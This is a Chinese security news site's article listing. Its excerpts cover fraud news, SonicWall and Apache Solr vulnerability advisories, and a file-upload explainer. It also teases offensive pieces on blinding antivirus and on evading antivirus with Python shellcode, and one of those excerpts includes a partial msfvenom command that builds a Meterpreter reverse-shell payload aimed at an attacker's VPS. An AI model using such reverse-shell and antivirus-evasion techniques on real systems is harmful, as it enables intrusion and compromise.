发表的所有文章 | CN-SEC 中文网

云安全

网络5.0内生安全可信体系论述

作者简介马铮中国联合网络通信有限公司研究院正高级工程师，长期从事网络与信息安全等方面的研究工作。闫新成中兴通讯股份有限公司安全平台部高级工程师，长期从事网络安全、安全产品等方面的研究工作。周继华 ...

01月16日85 views评论

阅读全文

安全新闻

印度制药巨头遭电子邮件诈骗，损失逾4500万元

关注我们带你读懂网络安全印度制药巨头阿尔肯实验室子公司部分员工的企业邮箱遭入侵，导致旗下一家子公司向欺诈分子转账5.2亿卢比。前情回顾·全球网络诈骗态势上市公司海普瑞遭遇电信诈骗，损失逾9000万元木...

01月16日86 views评论

阅读全文

安全文章

LOLbin致盲360核晶 (3)

还记得之前分享的那篇文章吗？LOLbin致盲360核晶【tgp_daemon.exe】直接被标记名字了，直接把路子走绝了！！！绞尽脑子，试了又试，好像被我试出来了，在这里继续分享给各位...

01月16日275 views评论

阅读全文

安全工具

DeepSecrets：一款能够理解代码语义的代码敏感信息扫描工具

关于DeepSecrets DeepSecrets是一款能够理解代码语义的代码敏感信息扫描工具，在该工具的帮助下，广大研究人员将能够更有效地扫描和分析代码中的敏感信息。社区中很多现有的代码分析工...

01月16日56 views评论

阅读全文

安全新闻

超过 17.8万个 SonicWall防火墙易受到DoS和潜在RCE攻击

据BleepingComputer消息，有超过17.8万个 SonicWall 下一代防火墙 (NGFW) 容易受到拒绝服务 (DoS) 和潜在的远程代码执行 (RCE) 攻击，这些设备受到两个 Do...

01月16日234 views评论

阅读全文

安全新闻

超 17.8 万个 SONICWALL 防火墙遭黑客攻击

关键词安全漏洞SonicWall 下一代防火墙（NGFW）系列 6 和 7 设备受到两个未经身份验证的拒绝服务漏洞的影响，分别跟踪为 CVE-2022-22274 和 CVE-2023-0656，...

01月16日66 views评论

阅读全文

安全新闻

OpenAI已删除禁止其技术被用于军事用途的条款，之后可用于军事等

关键词OpenAI近期，OpenAI公司对其使用政策进行了重大调整，引起了外界的广泛关注。据报道，该公司在使用条款中删除了明确禁止将其技术用于军事目的的规定。原先的禁止“具有高身体伤害风险的活动”、特...

01月16日44 views评论

阅读全文

安全漏洞

Apache Solr 环境变量信息泄漏漏洞

漏洞描述Apache Solr 是一款开源的搜索引擎。在 Apache Solr 受影响版本中，由于 Solr Metrics API 默认输出所有未单独配置保护策略的环境变量。在默认无认证或具有 m...

01月16日33 views评论

阅读全文

安全百科

文件上传漏洞

想要挖掘一个漏洞我们首先就要知道这个漏洞是如何产生的。1.漏洞产生原理没有对用户上传的文件做校验和没有控制服务器对上传目录的解析和执行行为，导致具有危害的脚本被保存到服务器上，错误的执行了这些有危害的...

01月16日31 views评论

阅读全文

【漏洞通告】Apache Solr信息泄露漏洞（CVE-2023-50290）

一、漏洞概述漏洞名称 Apache Solr信息泄露漏洞CVE IDCVE-2023-50290漏洞类型信息泄露发现时间2024-01-15漏洞评分暂无漏洞等级高危攻击向量网络所需权限无利用难...

01月16日安全漏洞69 views评论

阅读全文

安全工具

Python免杀shellcode篇-反序列化过360核晶-火绒-Windows defender

反序列化+远程分离免杀+反沙箱首先也是通过 msfvenom -p windows/x64/meterpreter/reverse LHOST=你的vps地址 LPORT=4444 -f c -b ...

01月16日87 views评论

阅读全文

安全文章

实战纪实 | 从接口信息泄露到RCE

扫码领资料获网安教程本文由掌控安全学院 - 杳若投稿打点开局一个登录框信息收集发现了一处接口泄露了部分信息不过只有支付宝密钥的信息无法扩大危害，此时尝试寻找了一下其他同类型系统同样的接口，查看一下是...

01月16日36 views评论

阅读全文

网络5.0内生安全可信体系论述

印度制药巨头遭电子邮件诈骗，损失逾4500万元

LOLbin致盲360核晶 (3)

DeepSecrets：一款能够理解代码语义的代码敏感信息扫描工具

超过 17.8万个 SonicWall防火墙易受到DoS和潜在RCE攻击

超 17.8 万个 SONICWALL 防火墙遭黑客攻击

OpenAI已删除禁止其技术被用于军事用途的条款，之后可用于军事等

Apache Solr 环境变量信息泄漏漏洞

文件上传漏洞

【漏洞通告】Apache Solr信息泄露漏洞（CVE-2023-50290）

Python免杀shellcode篇-反序列化过360核晶-火绒-Windows defender

实战纪实 | 从接口信息泄露到RCE

在线咨询

微信